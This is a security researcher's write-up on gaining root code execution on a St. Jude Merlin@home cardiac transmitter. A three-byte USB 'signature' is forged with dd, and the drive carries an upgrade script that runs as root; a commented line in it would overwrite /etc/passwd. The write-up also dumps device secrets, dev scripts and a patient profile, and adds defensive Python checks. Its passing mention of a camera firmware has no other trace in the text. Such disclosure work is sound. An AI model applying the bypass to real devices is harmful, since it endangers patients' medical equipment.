# Script to mount valid sjm pendrive(s) via hotplug. Hotplug will invoke <br />
# this script only if the attached USB device is a mass-storage device.<br />
# hotplug does this by looking at the device class of the attached usb device<br />
# See /etc/hotplug/usb.usermap. The device class for mass storage devices<br />
# is ______<br />
# <br />
# In a nutshell, the script looks in /proc/scsi/usb-storage* directory to<br />
# find the scsi ID of the attached USB storage device. It then goes on to<br />
# find the device node corresponding to this scsi ID.<br />
# <br />
# version 1.1 - Added USB signature check functionality <br />
#<br />
# For the new cellular adapters - viz mobidata and velocity, ignore the<br />
# mass storage interface reported. Please see comments at the top of<br />
# /etc/hotplug/usb/velocity for details.<br />
#<br />
# - Ashok Iyer (16-Jun-2010)<br />
#<br />
<br />
export PATH=/usr/bin:/usr/local/bin:$PATH<br />
<br />
MOUNT_PATH="/mnt/sjmpendrives"<br />
MOUNT_NUMBER=1<br />
LOG_FILE="/tmp/usbstorage.log"<br />
SGMAP="sg_map"<br />
<br />
<br />
# The functions in this script rely on "echo" to pass information to each<br />
# other. If you need to modify this script, do not use "echo" for debugging.<br />
# Instead use the feedback()/error_exit() functions below. These will log <br />
# information to a log file and do not interfere with information passing <br />
# between functions.<br />
<br />
***snip***<br />
<br />
function check_sign {<br />
local node1=$1"1"<br />
feedback "Checking signature ... "<br />
feedback "node1 = $node1"<br />
dd if=$node1 of=/tmp/.sign bs=1 count=3 skip=501<br />
signature=`cat /tmp/.sign` <br />
<br />
if [ "$signature" = "SJM" ]; then<br />
feedback "Valid pendrive"<br />
echo 0<br />
else<br />
feedback "Invalid pendrive"<br />
echo -1<br />
fi<br />
}<br />
<br />
***snip***<br />
<br />
# We only mount the first partition of a USB storage device. There is no <br />
# requirement to mount multiple partitions. Makes the job easy :-)<br />
function mount_scsi_dev {<br />
local scsi_dev=$1<br />
local mountpt=""<br />
<br />
# check if the first partition of the device is mounted <br />
if ! mount | egrep -q "^$scsi_dev"1"[[:space:]]" <br />
then<br />
mountpt=$(find_unused_mountpt) || error_exit "Failed to find a mount pt"<br />
mkdir -p "$mountpt" || error_exit "Failed to create mount pt $mountpt"<br />
<br />
# FIXME- Ugly hack to detect partitions on USB flash drive<br />
# Possible bug in Kernel and/or devfs. Either use devfs=nomount kernel cmdline<br />
# or fix devfs once and for all.<br />
# There is another problem in devfs that after the USB flash disk is removed<br />
# the corresponding devfs partitions (part1, part2 etc...) still show up. <br />
foobar=`ls -l $scsi_dev | awk '{print $11}'`<br />
dd if=/dev/$foobar of=/dev/null bs=1 count=1 <br />
<br />
# Checking USB signature<br />
ret=`check_sign $scsi_dev` <br />
if [ $ret -eq 0 ]; then<br />
feedback "Valid pendrive"<br />
else<br />
# Tanto: Inform the Exec App to show <br />
# an Invalid Media Error<br />
if [ -p /tmp/remoteInt.pipe ]; then<br />
echo "UsbHotplug InvalidMedia" > /tmp/remoteInt.pipe<br />
error_exit "Invalid pendrive"<br />
else<br />
echo "ERROR: /tmp/remoteInt.pipe does not exist!!!"<br />
fi<br />
fi<br />
<br />
feedback "Mounting $scsi_dev"1" on $mountpt"<br />
mount -t auto $scsi_dev"1" $mountpt<br />
if [ "$?" -eq 0 ]; then<br />
feedback "$scsi_dev"1" is now mounted on $mountpt"<br />
feedback "Launch application specific script" <br />
sh /etc/launch_appln.sh $mountpt<br />
else<br />
feedback "Mount error for $scsi_dev"<br />
fi<br />
else<br />
feedback "Ignoring $scsi_dev - already mounted"<br />
fi<br />
}<br />
<br />
# Find and mount all attached USB storage devices<br />
function mount_all_attached {<br />
local scsiuniqid=""<br />
feedback "Find and mount all attached usb storage devices"<br />
<br />
for scsiuniqid in $(allusb_scsiuniqid)<br />
do<br />
local scsidev="`diskdev_from_uniqid $scsiuniqid`"<br />
if [ "$scsidev" == "UNKNOWN" ]; then<br />
sleep 1<br />
fi<br />
mount_scsi_dev $scsidev<br />
done<br />
}<br />
<br />
***snip***<br />
<br />
<br />
# The remover script will be invoked when the device is removed. This is<br />
# useless in a way because umount will have no effect. The only benefit is<br />
# that the "mount" command will not show stale entries.<br />
<br />
# FIXME - Need to add specialized LOGIC to selectively umount USB flash drive <br />
# which is removed ( unlike umounting all attached USB flash drives )<br />
feedback "REM = $REMOVER"<br />
if [ -f $REMOVER ]; then<br />
echo '/bin/umount /mnt/sjmpendrives/*' >> $REMOVER<br />
else<br />
echo -e '#!/bin/sh\n/bin/umount /mnt/sjmpendrives/*' > $REMOVER<br />
fi<br />
<br />
# Inform the Export data script when pendrive is unplugged.<br />
echo -e '\nps -A | grep export_data \nif [ $? -eq 0 ]; then \n\tif [ -p /tmp/usbDataExport.pipe ]; then \n\t\t echo "Hotplug umount" > /tmp/usbDataExport.pipe \n\tfi\nfi' >> $REMOVER<br />
chmod a+x $REMOVER<br />
<br />
mount_all_attached</pre><br />
<br />
Lets look inside of /etc/launch_appln.sh<br />
<br />
<pre>#!/bin/sh<br />
<br />
if [ $# -ne 1 ]; then<br />
echo "usage: ./launch_appln.sh /mnt/pendrive"<br />
exit<br />
fi<br />
<br />
# FIXME <br />
# This script may be invoked by hotplug <br />
# Do not run the script if it is already running <br />
# updater or data export<br />
<br />
mountpt=$1<br />
script_path=/apps/tanto/<br />
<br />
if [ -f $mountpt/version.ini ]; then<br />
# call updater script<br />
echo "Launching updater script"<br />
if [ -f $mountpt/etc/init.d/upgrade_script.sh ]; then<br />
sh $mountpt/etc/init.d/upgrade_script.sh $mountpt > /tmp/debugUpdater.txt 2>&1<br />
umount /mnt/sjmpendrives/1<br />
umount /mnt/pendrive<br />
else<br />
umount /mnt/sjmpendrives/1<br />
umount /mnt/pendrive<br />
exit 0<br />
fi<br />
else<br />
# Call Data export script<br />
echo "Launching export data script"<br />
sh $script_path/export_data.sh $mountpt<br />
umount /mnt/sjmpendrives/1<br />
umount /mnt/pendrive<br />
fi</pre><br />
<br />
It looks like their pendrive "signature" is fairly easy to get around: check_sign() just reads three bytes at offset 501 of the first partition and compares them with "SJM", so dd can stamp the magic onto any drive. Note also that in mount_scsi_dev an invalid signature only aborts when /tmp/remoteInt.pipe exists; otherwise the script logs an error and carries on to mount the drive and launch the application script.<br />
<br />
<pre>rjmendez@Rjmendez:~/stjude_merlin$ sudo dd if=/dev/sdb1 of=/tmp/.sign bs=1 count=3 skip=501<br />
3+0 records in<br />
3+0 records out<br />
3 bytes copied, 0.00116472 s, 2.6 kB/s<br />
rjmendez@Rjmendez:~/stjude_merlin$ hd /tmp/.sign <br />
00000000 00 00 00 |...|<br />
00000003<br />
rjmendez@Rjmendez:~/stjude_merlin$ hd .sign_mod<br />
00000000 53 4a 4d |SJM|<br />
00000003<br />
rjmendez@Rjmendez:~/stjude_merlin$ sudo dd if=.sign_mod bs=1 count=3 of=/dev/sdb1 bs=1 seek=501<br />
3+0 records in<br />
3+0 records out<br />
3 bytes copied, 0.00700994 s, 0.4 kB/s<br />
rjmendez@Rjmendez:~/stjude_merlin$ sudo dd if=/dev/sdb1 of=/tmp/.sign bs=1 count=3 skip=501<br />
3+0 records in<br />
3+0 records out<br />
3 bytes copied, 0.00123249 s, 2.4 kB/s<br />
rjmendez@Rjmendez:~/stjude_merlin$ hd /tmp/.sign <br />
00000000 53 4a 4d |SJM|<br />
00000003</pre><br />
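As an added example (mine, not code from either the Merlin@home or the camera firmware), the Python below reproduces the SJM check and the dd forgery on a constructed 512-byte boot sector, then shows the check that both this device and the camera's sd_card_insert.sh hook lack: an authenticator computed over the payload that actually gets executed, keyed with a secret the attacker does not hold. The HMAC key, the payload text and the sector image are constructed for the example; a production design would use an asymmetric signature so that the verifying key on the device cannot also be used to sign.<br />

```python
"""Weak pendrive 'signature' vs. an authenticated update payload.

Added example, not code from the Merlin@home or camera firmware. The weak
check mirrors check_sign() in /etc/hotplug/usb/sjmusb (three fixed bytes at
offset 501 of the first partition); the hardened check is an assumed
replacement, not something either device implements.
"""
import hashlib
import hmac

SIG_OFFSET = 501          # skip=501 / seek=501 in the dd commands above
SIG_MAGIC = b"SJM"
SECTOR = 512


def sjm_check_sign(partition: bytes) -> bool:
    """The device's test: do bytes 501..503 of the partition read 'SJM'?"""
    return partition[SIG_OFFSET:SIG_OFFSET + len(SIG_MAGIC)] == SIG_MAGIC


def sjm_forge_sign(partition: bytes) -> bytes:
    """What `dd if=.sign_mod of=/dev/sdb1 bs=1 seek=501` does: stamp it."""
    buf = bytearray(partition)
    buf[SIG_OFFSET:SIG_OFFSET + len(SIG_MAGIC)] = SIG_MAGIC
    return bytes(buf)


def make_tag(payload: bytes, key: bytes) -> bytes:
    """Authenticator over the update script itself (assumed design)."""
    return hmac.new(key, payload, hashlib.sha256).digest()


def hardened_check(payload: bytes, tag: bytes, key: bytes) -> bool:
    """Accept the update only if the tag over its bytes matches.

    compare_digest keeps the comparison constant-time; the tag is bound to
    the script content, so editing the script or guessing the key fails.
    """
    return hmac.compare_digest(make_tag(payload, key), tag)


# Constructed sample: a blank FAT-style boot sector (55 AA trailer, no
# magic), the upgrade script from the page, and a stand-in device key.
BLANK_SECTOR = bytes(SECTOR - 2) + b"\x55\xaa"
UPDATE_SCRIPT = (
    b"#!/bin/sh\n"
    b"/etc/init.d/tantoapp stop\n"
    b"echo 'This worked!' > /root/diditwork.txt\n"
)
DEVICE_KEY = b"constructed-32-byte-device-key!!"   # assumed provisioned secret


def demo() -> dict:
    """Run both checks on the constructed data and return the outcomes."""
    forged = sjm_forge_sign(BLANK_SECTOR)
    good_tag = make_tag(UPDATE_SCRIPT, DEVICE_KEY)
    tampered = UPDATE_SCRIPT + b"cp /mnt/sjmpendrives/1/passwd /etc/passwd\n"
    guessed_tag = make_tag(UPDATE_SCRIPT, b"guess")
    return {
        "blank_passes_sjm": sjm_check_sign(BLANK_SECTOR),                   # False
        "forged_passes_sjm": sjm_check_sign(forged),                        # True
        "bytes_changed_to_forge": sum(a != b for a, b in zip(forged, BLANK_SECTOR)),  # 3
        "genuine_passes_hmac": hardened_check(UPDATE_SCRIPT, good_tag, DEVICE_KEY),   # True
        "tampered_passes_hmac": hardened_check(tampered, good_tag, DEVICE_KEY),       # False
        "wrong_key_passes_hmac": hardened_check(UPDATE_SCRIPT, guessed_tag, DEVICE_KEY),  # False
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The point of the comparison is where the check lives: the SJM magic says nothing about the version.ini or upgrade_script.sh that launch_appln.sh goes on to execute, so the gate has to be computed over those files (and checked again after mounting, not from a copy on the untrusted drive).<br />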
<br />
Add the required files to the drive: a version.ini so launch_appln.sh takes the updater branch, and etc/init.d/upgrade_script.sh, which it then runs as root. Here the script just stops the Tanto app, drops a marker file and flashes the LEDs.<br />
<br />
<pre>rjmendez@Rjmendez:/media/rjmendez/7A3B-B3C6$ ls -lahR<br />
.:<br />
total 36K<br />
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 14 11:04 .<br />
drwxr-x---+ 8 root root 4.0K May 14 11:02 ..<br />
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 13 14:02 etc<br />
-rw-r--r-- 1 rjmendez rjmendez 620 May 14 06:01 passwd<br />
-rw-r--r-- 1 rjmendez rjmendez 4 May 10 17:07 version.ini<br />
<br />
./etc:<br />
total 24K<br />
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 13 14:02 .<br />
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 14 11:04 ..<br />
drwxr-xr-x 2 rjmendez rjmendez 8.0K May 13 14:02 init.d<br />
<br />
./etc/init.d:<br />
total 24K<br />
drwxr-xr-x 2 rjmendez rjmendez 8.0K May 13 14:02 .<br />
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 13 14:02 ..<br />
-rw-r--r-- 1 rjmendez rjmendez 771 May 13 18:27 upgrade_script.sh<br />
<br />
rjmendez@Rjmendez:/media/rjmendez/7A3B-B3C6$ cat etc/init.d/upgrade_script.sh <br />
#!/bin/sh<br />
function led_off {<br />
for i in `seq 0 7`;<br />
do<br />
ledControl -l$i -b0<br />
sleep 0.05<br />
done<br />
}<br />
<br />
function led_dim {<br />
for i in `seq 0 7`;<br />
do<br />
ledControl -l$i -b1<br />
sleep 0.05<br />
done<br />
}<br />
<br />
function led_bright {<br />
for i in `seq 0 7`;<br />
do<br />
ledControl -l$i -b2<br />
sleep 0.05<br />
done<br />
}<br />
<br />
function party_mode {<br />
counter=0<br />
while [ $counter -lt $1 ];<br />
do<br />
led_off<br />
sleep 0.05<br />
led_dim<br />
sleep 0.05<br />
led_bright<br />
sleep 0.05<br />
let counter=counter+1<br />
done<br />
}<br />
<br />
/etc/init.d/tantoapp stop<br />
#cp /mnt/sjmpendrives/1/passwd /etc/passwd<br />
echo "This worked!" > /root/diditwork.txt<br />
if [ -f /root/diditwork.txt ];<br />
then<br />
party_mode 15<br />
else<br />
echo "It did not work..."<br />
fi</pre><br />
<br />
This is the output that we get from the console.<br />
<br />
<pre>operator@(none):~$ su root<br />
Password: <br />
PAM_unix[265]: (su) session opened for user root by (uid=12)<br />
root@(none):~# hub.c: new USB device usb-mx2hci-2, assigned address 2<br />
scsi0 : SCSI emulation for USB Mass Storage devices<br />
Vendor: Lexar Model: USB Flash Drive Rev: 1100<br />
Type: Direct-Access ANSI SCSI revision: 02<br />
Attached scsi removable disk sda at scsi0, channel 0, id 0, lun 0<br />
SCSI device sda: 31285248 512-byte hdwr sectors (16018 MB)<br />
sda: Write Protect is off<br />
Partition check:<br />
/dev/scsi/host0/bus0/target0/lun0: p1<br />
modprobe: Can't locate module /dev/sg1<br />
modprobe: Can't locate module /dev/sg2<br />
modprobe: Can't locate module /dev/sg3<br />
modprobe: Can't locate module /dev/sg4<br />
modprobe: Can't locate module /dev/sg5<br />
modprobe: Can't locate module /dev/sdb<br />
modprobe: Can't locate module /dev/sdc<br />
modprobe: Can't locate module /dev/sdd<br />
modprobe: Can't locate module /dev/sde<br />
modprobe: Can't locate module /dev/sdf<br />
modprobe: modprobe: Can't locate module nls_cp437<br />
modprobe: modprobe: Can't locate module nls_iso8859-1<br />
modprobe: modprobe: Can't locate module nls_iso8859-1<br />
modprobe: modprobe: Can't locate module nls_iso8859-1<br />
ls /root<br />
devel_install.sh diditwork.txt setdev.sh setlog.sh<br />
root@(none):~# cat /root/diditwork.txt <br />
This worked!<br />
root@(none):~# cat /tmp/usbstorage.log <br />
+++ Starting USB (un)mounter script for device /proc/bus/usb/001/002<br />
REM = /var/run/usb/%proc%bus%usb%001%002<br />
Find and mount all attached usb storage devices<br />
usb proc-fs yields SCSI host number=0 - suffix with zeroes (kernel 2.4)<br />
Use sgmap to match 0:0:0:0.<br />
Waiting for device id to appear...<br />
SCSI disk for 0:0:0:0 is /dev/sda<br />
Checking /mnt/sjmpendrives/1<br />
Mountpoint /mnt/sjmpendrives/1 is free<br />
Checking signature ... <br />
node1 = /dev/sda1<br />
Valid pendrive<br />
Valid pendrive<br />
Mounting /dev/sda1 on /mnt/sjmpendrives/1<br />
/dev/sda1 is now mounted on /mnt/sjmpendrives/1<br />
Launch application specific script</pre><br />
<br />
== Party Mode Demo ==<br />
{{#ev:youtube|cNcGebu8NRs}}<br />
<br />
== Other Stuff to Look Into ==<br />
<br />
I doubt this device has been updated to the latest firmware as I acquired it still wrapped in its packaging. As of January 2017 St. Jude Medical claims that a security patch has been applied to the newer firmware releases.<br />
<br />
Below are some interesting things that were found.<br />
<br />
DSA keys and known hosts.<br />
<pre>root@(none):~# cd /root/.ssh<br />
root@(none):~/.ssh# ls -lah<br />
drwx------ 2 root root 0 Jan 10 2013 .<br />
drwxrwxr-x 3 root root 0 May 15 00:10 ..<br />
-rw------- 1 root root 668 Nov 28 2012 id_dsa<br />
-rw-r--r-- 1 root root 601 Nov 28 2012 id_dsa.pub<br />
-rw-r--r-- 1 root root 719 Nov 28 2012 known_hosts<br />
root@(none):~/.ssh# cat known_hosts <br />
REDACTED.merlin.net,150.202.X.X ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAtfdoYdn5D/vsC4Pm25jBUXDzfXrj6O50O32UONPOnvKcb08acULYcx1bDyeRGcMBqKwEJdPUKdwAT2evf4jYVSa4JvDAHQWJo15s2igWO04veEYitV5i0NEqVs+vRTJAqM70iCIKkhtoGkjBBnJcntw6u/8vgKXkvqBx85WBULc=<br />
REDACTED.merlin.net,150.202.X.X ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA29HEmKtQ5RABmAWmZ3MdyO+wiQ1GGzuNneGnPPL8KF+SYLjHXaQViB32cibA9dSauMpb8zcwj7YSxtKfu4K1gcH5vUOsqW9BgDsZYv7zWk2OHb8vLs+NT083+YbzjZvr7oGz+1/TAzfXORsN9Gf+BQMsHyjiHOjVJ/vEIy2fp0E=<br />
REDACTED.merlin.net,150.202.X.X ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAyDjGfUubwy0y0KJw459g2L17DK4K4QAIZSvcW8hupVNK/3IrP9HSXetS69czyLISFfewq6a4ippvsbh5i+fb2C2vhHmW4N1U3zKa6vcKzUEd6j6NwUefunbSP8XBXaMoqSuN2l3nbfEeUIaVDuSk9m6uP/rVcGVQHZokPVDdpP8=</pre><br />
<br />
Dev scripts in /root/<br />
<pre>root@(none):~# ls -lah /root<br />
drwxrwxr-x 3 root root 0 May 15 00:10 .<br />
drwxr-xr-x 20 root root 0 Jan 1 1970 ..<br />
-rw-r--r-- 1 root root 446 Jan 1 1970 .bash_history<br />
-rw-r--r-- 1 root root 52 Apr 24 2008 .bash_profile<br />
drwx------ 2 root root 0 Jan 10 2013 .ssh<br />
-r-xr-xr-x 1 root root 3.0k Nov 28 2012 devel_install.sh<br />
-r-xr-xr-x 1 root root 483 Nov 28 2012 setdev.sh<br />
-r-xr-xr-x 1 root root 267 Nov 28 2012 setlog.sh<br />
<br />
root@(none):~# cat setdev.sh <br />
#!/bin/sh<br />
<br />
if [ $# -ne 1 ]; then<br />
echo "usage: ./setdev.sh [1|0]"<br />
exit<br />
fi<br />
<br />
if [ $1 -eq 1 ]; then<br />
sed '1,$s/DEVELOPMENT \(.*= .*\)0/DEVELOPMENT \11/g' /data/config/TantoParms.conf > /tmp/TantoParms.conf<br />
cp -f /tmp/TantoParms.conf /data/config/TantoParms.conf<br />
elif [ $1 -eq 0 ]; then<br />
sed '1,$s/DEVELOPMENT \(.*= .*\)1/DEVELOPMENT \10/g' /data/config/TantoParms.conf > /tmp/TantoParms.conf<br />
cp -f /tmp/TantoParms.conf /data/config/TantoParms.conf<br />
else<br />
echo "Invalid argument"<br />
fi<br />
<br />
root@(none):~# cat setlog.sh <br />
#!/bin/sh<br />
<br />
if [ $# -ne 1 ]; then<br />
echo "usage: ./setlog.sh [1|0]"<br />
exit<br />
fi<br />
<br />
if [ $1 -eq 1 ]; then<br />
touch /data/config/.tantolog<br />
touch /data/config/.dcllog<br />
elif [ $1 -eq 0 ]; then<br />
rm /data/config/.tantolog<br />
rm /data/config/.dcllog<br />
else<br />
echo "Invalid argument"<br />
fi<br />
<br />
root@(none):~# cat devel_install.sh<br />
#!/bin/sh<br />
#<br />
# Script to download the devel package via scp from ftp.pacesetter.com<br />
# Username: REDACTED_USER. The script will prompt for a password which the <br />
# user has to enter. <br />
# <br />
# Version 0.1 - Ashok Iyer (aiyer at sjm dot com)<br />
<br />
# Setup the PATH. Don't assume we get a sane one<br />
export PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin<br />
<br />
# IP address of the server from which we download the devel package using scp.<br />
SERVER="10.16.155.27"<br />
<br />
function download_package()<br />
{<br />
# Download the devel package and the md5sum.txt file<br />
echo -e "\n==> Downloading $1 package using wget.\n"<br />
<br />
wget ftp://REDACTED_USER:REDACTED_PASSWORD@10.16.155.27/$2/$1<br />
<br />
if [ "$?" != 0 ]; then<br />
echo "scp failed..."<br />
exit 1<br />
fi<br />
}<br />
<br />
/root/setdev.sh 1<br />
/etc/init.d/tantoapp stop<br />
<br />
if [ ! -f /etc/password_key ]; then<br />
touch /etc/password_key<br />
fi<br />
<br />
echo "-----------------------------------------------------"<br />
echo "This script will install the development package" <br />
echo "This contains the following:"<br />
<br />
echo " 1. gdbserver"<br />
echo " 2. ssh server"<br />
echo " 3. procps (contains vmstat and top)"<br />
echo " 4. dos2unix and unix2dos"<br />
echo " 5. ftp client"<br />
echo " 6. mtd utilities (for diagnostics)"<br />
echo " 7. less utility"<br />
echo " 8. traceroute"<br />
echo " 9. agentd"<br />
echo " 10. monitord"<br />
echo "-----------------------------------------------------"<br />
<br />
sleep 2<br />
<br />
# Test if the server is reachable<br />
echo <br />
echo "---- Testing server connectivity ----"<br />
sleep 2<br />
ping -c 3 -w 10 $SERVER<br />
<br />
if [ "$?" != 0 ]; then<br />
echo <br />
echo "--- $SERVER not reachable. ---"<br />
echo " Will try connecting anyway (some firewalls block ping requests)".<br />
echo " Contact your network administrator if the connection fails"<br />
sleep 2<br />
else<br />
echo <br />
echo "--- Server reachable. Good! ---"<br />
echo<br />
fi<br />
<br />
TMPDIR="$HOME/devel$$"<br />
mkdir $TMPDIR<br />
<br />
if [ "$?" != 0 ]; then<br />
echo "unable to create temporary directory. Check if you have write"<br />
echo "permissions in $HOME"<br />
fi<br />
<br />
cd $TMPDIR<br />
# Download the development packages<br />
echo<br />
echo "+----------------------------------------------+"<br />
echo "| Downloading development packages using wget. |"<br />
echo "+----------------------------------------------+"<br />
echo<br />
<br />
download_package "devel-util_1.4_all.ipk" "not-so-advanced/utils/devel_packages/"<br />
<br />
echo<br />
echo "+---------------------------------------+"<br />
echo "| Installing the development utilities. |"<br />
echo "+---------------------------------------+"<br />
echo<br />
# The package is sane. Install it<br />
ipkg-cl -d root install *.ipk<br />
<br />
if [ "$?" != 0 ]; then<br />
echo "Package installation failed"<br />
exit 1<br />
fi<br />
<br />
echo<br />
echo "+-------------------------------------------+"<br />
echo "| Performing required config modifications. |"<br />
echo "+-------------------------------------------+"<br />
echo<br />
<br />
sed '1,$s/AUTOKEYGEN=no/AUTOKEYGEN=yes/g' /etc/default/ssh > /tmp/ssh<br />
cp -a /tmp/ssh /etc/default/ssh<br />
<br />
echo<br />
echo "+-------------------------------------------+"<br />
echo "| Starting SSH Daemon . |"<br />
echo "+-------------------------------------------+"<br />
echo<br />
<br />
/etc/init.d/ssh start<br />
<br />
echo<br />
echo "Devel package successfully installed"<br />
<br />
cd $HOME<br />
<br />
# delete TMPDIR<br />
rm -rf $TMPDIR<br />
<br />
exit 0</pre><br />
<br />
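The leftovers above (a DSA private key and a known_hosts file in /root/.ssh, plus development scripts that embed an FTP username and password in a wget URL, hard-code a dev server address and toggle a DEVELOPMENT flag in the config) are exactly the classes of artifact a pre-release firmware audit should catch. As an added example, not code from the device or from the manufacturer, here is a Python check that walks an extracted root filesystem and flags those classes. It builds its own small constructed rootfs in a temporary directory (192.0.2.x documentation addresses and made-up names, nothing copied from the device) so it runs offline; the regular expressions, the function names and the choice of file signatures are my assumptions.<br />

```python
import os
import re
import stat
import tempfile
from typing import List, Tuple

# Signatures for the classes of leftovers seen on the transmitter above.
PRIVATE_KEY_RE = re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----")
# scheme://user:password@host, the shape of the wget line in devel_install.sh
URL_CRED_RE = re.compile(r"\b[a-z][a-z0-9+.-]*://[^/\s:@]+:[^/\s@]+@")
# a quoted IPv4 literal assigned to a shell variable (SERVER="...")
IP_ASSIGN_RE = re.compile(r'^\s*\w+\s*=\s*"?(\d{1,3}(?:\.\d{1,3}){3})"?\s*$', re.M)
# scripts that flip a DEVELOPMENT flag in a config file (setdev.sh)
DEV_FLAG_RE = re.compile(r"\bDEVELOPMENT\b")

Finding = Tuple[str, str]  # (path relative to the rootfs, issue)


def _read_text(path: str) -> str:
    """Read the first 64 KiB of a file as text; enough for keys and scripts."""
    with open(path, "rb") as fh:
        return fh.read(64 * 1024).decode("utf-8", errors="replace")


def scan_rootfs(root: str) -> List[Finding]:
    """Walk an extracted root filesystem and report dev/test leftovers."""
    findings: List[Finding] = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            st = os.lstat(full)
            if not stat.S_ISREG(st.st_mode):
                continue  # skip symlinks, devices and the like
            text = _read_text(full)
            if PRIVATE_KEY_RE.search(text):
                findings.append((rel, "private key material"))
                if st.st_mode & 0o077:
                    findings.append((rel, "private key readable by other users"))
            if name == "known_hosts":
                findings.append((rel, "known_hosts lists backend hosts"))
            if URL_CRED_RE.search(text):
                findings.append((rel, "credentials embedded in URL"))
            for ip in IP_ASSIGN_RE.findall(text):
                findings.append((rel, f"hard-coded server address {ip}"))
            if name.endswith(".sh") and DEV_FLAG_RE.search(text):
                findings.append((rel, "toggles DEVELOPMENT build flag"))
    return sorted(findings)


def build_sample_rootfs() -> str:
    """Constructed miniature rootfs mimicking the layout seen on the device.

    All names, keys and addresses here are made up for the example.
    """
    root = tempfile.mkdtemp(prefix="rootfs_")
    ssh = os.path.join(root, "root", ".ssh")
    os.makedirs(ssh)
    key = os.path.join(ssh, "id_dsa")
    with open(key, "w") as fh:
        fh.write("-----BEGIN DSA PRIVATE KEY-----\nMIIBconstructed\n"
                 "-----END DSA PRIVATE KEY-----\n")
    os.chmod(key, 0o600)
    with open(os.path.join(ssh, "known_hosts"), "w") as fh:
        fh.write("backend.example.invalid,192.0.2.10 ssh-rsa AAAAB3Nzaconstructed\n")
    with open(os.path.join(root, "root", "devel_install.sh"), "w") as fh:
        fh.write('#!/bin/sh\nSERVER="192.0.2.27"\n'
                 "wget ftp://devuser:devpass@192.0.2.27/pkg/devel-util.ipk\n")
    with open(os.path.join(root, "root", "setdev.sh"), "w") as fh:
        fh.write("#!/bin/sh\nsed 's/DEVELOPMENT \\(.*= .*\\)0/DEVELOPMENT \\11/' "
                 "/data/config/parms.conf\n")
    os.makedirs(os.path.join(root, "etc"))
    with open(os.path.join(root, "etc", "hostname"), "w") as fh:
        fh.write("transmitter\n")  # benign file, must produce no finding
    return root


if __name__ == "__main__":
    for path, issue in scan_rootfs(build_sample_rootfs()):
        print(f"{path}: {issue}")
```

Run against a real extraction with `scan_rootfs("/path/to/extracted/rootfs")`; the point of the constructed tree is only to show what a clean run of each rule looks like.<br />
<br />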
Sample patient profile<br />
<pre><?xml version="1.0" encoding="UTF-8"?><br />
<profile:ProfileList xmlns:profile="http://www.merlin.net/PayloadProfile.xsd"><br />
<SystemData><br />
<SystemInformation DeviceModel="XXXX-XX" DeviceSerialNumber="XXXXXX" NumberOfProfiles="7" PatientNotifyWindowEnd="23:00:00" PatientNotifyWindowStart="16:00:00" ProfileDate="2011-09-07" ProfileVersion="7" SchemaVersion="A" TransmitterModelNumber="EX1150" TransmitterProfileID="100899" TransmitterRequestType="PProfile" TransmitterSerialNumber="00000000" UTCServerTime="22:57:29"/><br />
<Controls><br />
<Switch name="ADETECT_DIALUP_NUM" value="Enable"/><br />
<Switch name="UNPAIRED_MODE" value="Disable"/><br />
<Switch name="ENROLLMENT_CHANGE" value="Disable"/><br />
<Switch name="PROFILE_SYNC_PREF" value="Enable"/><br />
<iSwitch name="ALLWD_UNSCHED_EVENTS" value="100"/><br />
<iSwitch name="NOTIFY_DELAY_ALERT" value="24"/><br />
<iSwitch name="NOTIFY_DELAY_FLP" value="96"/><br />
<iSwitch name="NOTIFY_DELAY_MED" value="0"/><br />
<iSwitch name="NOTIFY_DELAY_SERVER" value="0"/><br />
<tSwitch name="CLINIC_TYPE" value="UNKNOWN"/><br />
<tSwitch name="SHORT_BTN_ACTION" value="FLP"/><br />
<tSwitch name="LONG_BTN_ACTION" value="DCHK"/><br />
<tSwitch name="MERLIN_ID" value="512556937"/><br />
<tSwitch name="UPDATED_DEVICE_MODEL" value="1111-11"/><br />
<tSwitch name="UPDATED_DEVICE_SERIAL" value="999999"/><br />
<tSwitch name="SCHED_REF_TIME" value="2001-01-01_00-00-00"/><br />
<tSwitch name="VOL_CTRL_PREF" value="OFF"/><br />
</Controls><br />
</SystemData><br />
<PayloadProfile Type="Follow-up"><br />
<GenerateSchedule GS_DateOfEvent="2011-09-08" GS_TimeOfEvent="09:00:00"/><br />
<Controls><br />
<Switch name="GDC2_SCHED_FLP_PREF" value="Enable"/><br />
<Switch name="UNSCHED_FLP_PREF" value="Enable"/><br />
<Switch name="SCHED_FLP_PREF" value="Disable"/><br />
<Switch name="CLEAR_EPIS_FLAG" value="Enable"/><br />
<Switch name="CLEAR_ST_FLAG" value="Disable"/><br />
<Switch name="CLEAR_DIAG_FLAG" value="Enable"/><br />
<Switch name="CLEAR_SEGM_FLAG" value="Enable"/><br />
</Controls><br />
</PayloadProfile><br />
<PayloadProfile Type="Device_Check"><br />
<GenerateSchedule GS_Interval="24" GS_TimeOfEvent="09:00:00"/><br />
<Controls><br />
<Switch name="UNSCH_DCHK_PREF" value="Enable"/><br />
<Switch name="SCHED_DCHK_PREF" value="Disable"/><br />
</Controls><br />
</PayloadProfile><br />
<PayloadProfile Type="Alert_Controls"><br />
<Controls><br />
<Switch name="HIGH_VRATE_EPISODE_ALERT" value="Disable"/><br />
<Switch name="V_AUTOCAP_ALERT" value="Disable"/><br />
<Switch name="ACAP_CONFIRM_ALERT" value="Disable"/><br />
<Switch name="RVCAP_CONFIRM_ALERT" value="Disable"/><br />
<Switch name="LVCAP_CONFIRM_ALERT" value="Disable"/><br />
<Switch name="HIGH_VRATE_EPISODE_NOT" value="Disable"/><br />
<Switch name="V_AUTOCAP_NOT" value="Disable"/><br />
<Switch name="ACAP_CONFIRM_NOT" value="Disable"/><br />
<Switch name="RVCAP_CONFIRM_NOT" value="Disable"/><br />
<Switch name="LVCAP_CONFIRM_NOT" value="Disable"/><br />
<Switch name="CONG_MON_ALERT" value="Enable"/><br />
